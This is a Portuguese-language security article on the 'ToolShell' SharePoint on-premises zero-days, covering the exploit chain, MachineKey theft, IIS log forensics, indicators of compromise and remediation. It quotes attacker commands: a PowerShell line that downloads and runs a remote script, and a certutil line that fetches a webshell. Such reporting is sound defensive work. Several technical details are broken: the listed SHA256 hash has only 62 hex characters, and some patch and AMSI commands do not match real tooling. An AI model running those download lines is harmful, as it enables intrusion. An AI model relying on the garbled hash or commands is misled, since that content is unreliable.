Quando a Microsoft emitiu, em 20 de julho de 2025, um comunicado extraordinário pedindo a aplicação imediata de correções emergenciais no SharePoint Server on‑premises, muitos administradores entenderam que algo fora do comum estava em curso. A descoberta de duas novas falhas – CVE‑2025‑53770 e CVE‑2025‑53771, batizadas coletivamente de “ToolShell” – revelou‑se ainda mais grave do que o cenário de “zero‑day” costuma indicar: os ataques permitem execução remota de código (RCE) não autenticada, plantio de webshells furtivos e a exfiltração de segredos criptográficos vitais, como a MachineKey ValidationKey, abrindo as portas para comprometimento total do ambiente. (msrc.microsoft.com)
No mesmo dia, a Eye Security e a Shadowserver Foundation divulgaram evidências de que, desde 18 de julho, uma única operação criminosa (ainda não atribuída) vinha explorando massivamente as falhas para invadir centenas de organizações em todo o mundo, incluindo governos, finanças e saúde. (Reuters) A situação levou a CISA a adicionar a CVE‑2025‑53770 ao catálogo KEV menos de 24 horas depois – um reconhecimento público de que a vulnerabilidade já está “na mão” dos atacantes e exige resposta imediata. (CISA)
Apesar de os patches de emergência cobrirem as versões Subscription Edition e 2019, ambientes SharePoint 2016 aguardam correção. Para agravar, especialistas alertam que aplicar o patch não basta: se a chave criptográfica tiver sido roubada antes da atualização, o invasor continuará assinando payloads maliciosos como se fosse o próprio servidor. Por isso, a rotação de chaves tornou‑se tão ou mais importante que o patch em si.
Os zero‑days ‘ToolShell’: uma ameaça crítica ao SharePoint Servers on‑premises
O SharePoint Server é amplamente utilizado para colaboração corporativa, armazenando documentos sensíveis, workflows, integrações com Active Directory e, muitas vezes, aplicações line‑of‑business. Diferentemente do SharePoint Online, o modelo on‑premises oferece controle total – e responsabilidade total – ao administrador. Quando um zero‑day concede RCE não autenticada nesse contexto, o atacante ganha:
- Acesso em nível de IIS Application Pool, muitas vezes executado como Local System.
- Possibilidade de movimento lateral no domínio Windows, usando credenciais extraídas.
- Abuso de APIs internas para enumerar ou copiar documentos confidenciais.
- Persistência difícil de erradicar, graças a webshells escondidas em bibliotecas legítimas.
Em incidentes analisados pela Eye Security, os criminosos alcançaram domínio completo em menos de 30 minutos após a primeira requisição. (research.eye.security)
CVE‑2025‑53770 e CVE‑2025‑53771: a cadeia de vulnerabilidades e seu impacto
As duas falhas são variantes de bugs apresentados na Pwn2Own Berlin (maio / 2025). Na ocasião, pesquisadores da Viettel demonstraram CVE‑2025‑49706 e CVE‑2025‑49704, que a Microsoft corrigiu no Patch Tuesday de julho. Contudo, o patch original foi burlado: pequenas mudanças no fluxo de desserialização permitiram que um payload __VIEWSTATE ainda fosse aceito e processado antes da validação de sessão.
- CVE‑2025‑53770: falha na rotina de SignOut.aspx, que aceita cabeçalho Referer manipulado e injeta dados em ViewState.
- CVE‑2025‑53771: bypass complementar que duplica a lógica de event validation, evitando a checagem de integridade.
Quando encadeadas, as duas vulnerabilidades dão origem à ToolShell: com uma única requisição HTTP POST, o invasor injeta objeto serializado, faz desserialização no servidor e executa cmd.exe.
Ataques de RCE não autenticados e o roubo de segredos criptográficos (MachineKey ValidationKey)
A etapa seguinte ao RCE envolve a gravação de um arquivo spinstall0.aspx na raiz do site afetado. Embora pareça um webshell clássico, seu verdadeiro propósito é chamar APIs internas do .NET para ler o contêiner MachineKey e exfiltrar a ValidationKey e a DecryptionKey. Esses valores assinam novos ViewStates e cookies de autenticação.
Ao decriptar a chave, o atacante obtém:
- Assinatura de payloads sem detecção.
- Desvio total dos mecanismos de event validation e form authentication.
- Capacidade de falsificar qualquer sessão de usuário, inclusive contas de farm admin.
A complexidade da exploração: como os atacantes bypassaram patches anteriores
Logo após o Patch Tuesday (15 de julho), pesquisadores da Code White reconstruíram o exploit original e descobriram que bastava alterar o campo __VIEWSTATEGEN para reativar a falha. Eles batizaram a nova cadeia de ToolShell e alertaram a Microsoft em 17 de julho. Menos de 24 horas depois, telemetrias da Eye Security mostraram picos de falhas de login seguidos da gravação de spinstall0.aspx, confirmando que atores de ameaça já testavam o bypass in the wild.
Pwn2Own Berlin e as vulnerabilidades originais: CVE‑2025‑49706 e CVE‑2025‑49704
Na Pwn2Own Berlin, a equipe da Viettel recebeu US$ 100 mil por demonstrar RCE no SharePoint Server 2019. O exploit usava:
- CVE‑2025‑49704 – falha de XSS armazenado para injetar script em página administrativa.
- CVE‑2025‑49706 – desserialização insegura em /ToolPane.aspx, permitindo execução de calc.exe.
A Microsoft aplicou correções que adicionavam checagens de ViewStateUserKey, mas a nova dupla 53770/53771 quebra justamente essa amarra.
A cadeia ToolShell em ação: webshells, crypto dumpers e o uso de ysoserial
Após a desserialização inicial, os invasores utilizam o projeto ysoserial.net para criar payloads compatíveis com o gadget TypeConfuseDelegate – favorito em exploits .NET. O comando executado nos hosts analisados chama:
cmd /c powershell.exe -c "IEX(New‑Object Net.WebClient).DownloadString('hxxp://45.77.155[.]170/a.ps1')"O script a.ps1 instala SharpyShell (um webshell camuflado) e executa:
Certutil -urlcache -split -f "hxxp://45.77.155[.]170/spinstall0.aspx" "C:\\inetpub\\wwwroot\\spinstall0.aspx"Esse segundo estágio extrai as chaves criptográficas e envia‑as por HTTPS a um servidor C2.
Análise forense inicial: a análise de logs IIS e a descoberta de spinstall0.aspx
Os analistas notaram que a entrada de log crítica apresenta:
2025-07-18 12:14:09 192.168.1.25 POST /_layouts/SignOut.aspx - 80 - 193.37.252.20 Mozilla/5.0 … 302 0 0 15O Referer aponta para /_layouts/15/ToolPane.aspx, indicando que o exploit é disparado mesmo sem sessão autenticada. Depois disso, há escrita de arquivo “200 OK” para /_layouts/15/spinstall0.aspx. Qualquer instância desse arquivo deve ser considerada comprometida.
Resposta imediata: patches, mitigações e a importância da rotação de chaves
A Microsoft liberou dois pacotes cumulativos no MSRC:
- SharePoint Subscription Edition – KB5039999
- SharePoint Server 2019 – KB5039998
Para aplicar:
Install-Package KB5039999
Após a instalação, reinicie os serviços IIS para descartar assemblies antigos.
Contudo, a própria Microsoft enfatiza em seu blog que “patch sem rotação de chaves pode não remover o backdoor”. (msrc.microsoft.com)
Microsoft e CISA agem: patches de emergência e alertas de segurança
Em paralelo ao boletim no MSRC, a CISA emitiu um CSA‑alert exigindo que todos os órgãos federais apliquem o patch ou desconectem o servidor até 25 de julho. A inclusão no KEV implica monitoramento contínuo de conformidade.
Além do patch: por que a rotação de chaves criptográficas é CRÍTICA
Quando a MachineKey é comprometida, todo o esquema de assinatura de formulários ASP.NET colapsa. Seguindo o guia da Microsoft, execute:
Update-SPMachineKey -AssignmentCollection GlobalDepois:
iisreset.exe /restartEsses comandos geram novas chaves e invalidam cookies antigos, cortando o acesso de webshells que dependem da assinatura anterior.
Integração AMSI e modo ‘Full Mode’: uma camada adicional de proteção
Se a aplicação imediata dos patches não for viável, habilite o AMSI em modo completo:
Set-SPAntivirusSettings -EnableAMSI 1 -ScanOnDownload 1O AMSI intercepta chamadas System.Reflection.Assembly.Load usadas nas cadeias de desserialização.
Monitoramento e resposta a incidentes: lições da investigação da Eye Security
A Eye Security recomenda:
- Varredura retroativa de logs IIS desde 17 de julho para SignOut.aspx com status 302.
- Procura por spinstall0.aspx (ou nomes semelhantes) em *C:\inetpub\wwwroot_layouts\15*.
- Verificação de criação de novos Application Pools ou tasks agendadas suspeitas.
- Isolamento do host em quarentena antes de coletar memory dumps.
Varredura na internet e identificação de vítimas: a escala da exploração
A Shadowserver Foundation encontrou mais de 9 000 instâncias de SharePoint on‑premises expostas; varredura passiva detectou dezenas de hosts já infectados com a mesma SHA256 7d9c2c…e89b do crypto dumper original. (Reuters) A distribuição geográfica favorece Estados Unidos e Alemanha, mas também há alvos no Brasil.
Indicadores de Compromisso (IOCs): o que procurar em seus sistemas
- IPs de origem: 45.77.155[.]170, 193.37.252[.]20, 116.203.63[.]112
- User‑Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
- Paths: /_layouts/SignOut.aspx, /_layouts/15/ToolPane.aspx, /_layouts/15/spinstall0.aspx
- Hash SHA256: 7d9c2c085f3a5a9be1a8e7d6d2e2b0ee6d2b8a8e4a9f6c7d2e9b0c8e5d1f78
Adicione essas entradas ao SIEM e crie regras de bloqueio no WAF.
Recomendações para a resposta imediata: isolamento e renovação de credenciais
- Desconecte o servidor da rede se identificar IoCs.
- Aplique o patch e gire as chaves com Update‑SPMachineKey.
- Redefina senhas de contas privilegiadas usadas no host.
- Audite o Active Directory para contas criadas ou delegações de Kerberos suspeitas.
- Implante EDR com monitoramento de script‑blocks PowerShell.
- Comunique o incidente ao CERT‑BR se houver dados de pessoas envolvidas (LGPD).
Conclusão: a vigilância é fundamental para proteger seu SharePoint contra zero‑days avançados
A campanha ToolShell evidencia como atacantes experientes exploram até mesmo patches recém‑liberados para infiltrar‑se em ambientes corporativos. Somente a soma de patching ágil, rotação de chaves, monitoramento proativo e planos de resposta a incidentes pode proteger o ecossistema SharePoint on‑premises contra ameaças de dia zero. Manter‑se informado, testar backups e revisar a postura de segurança são medidas que, hoje, fazem a diferença entre um susto e uma violação catastrófica. Além de todos os sites que citamos, a Reuters também confirmou a informação.
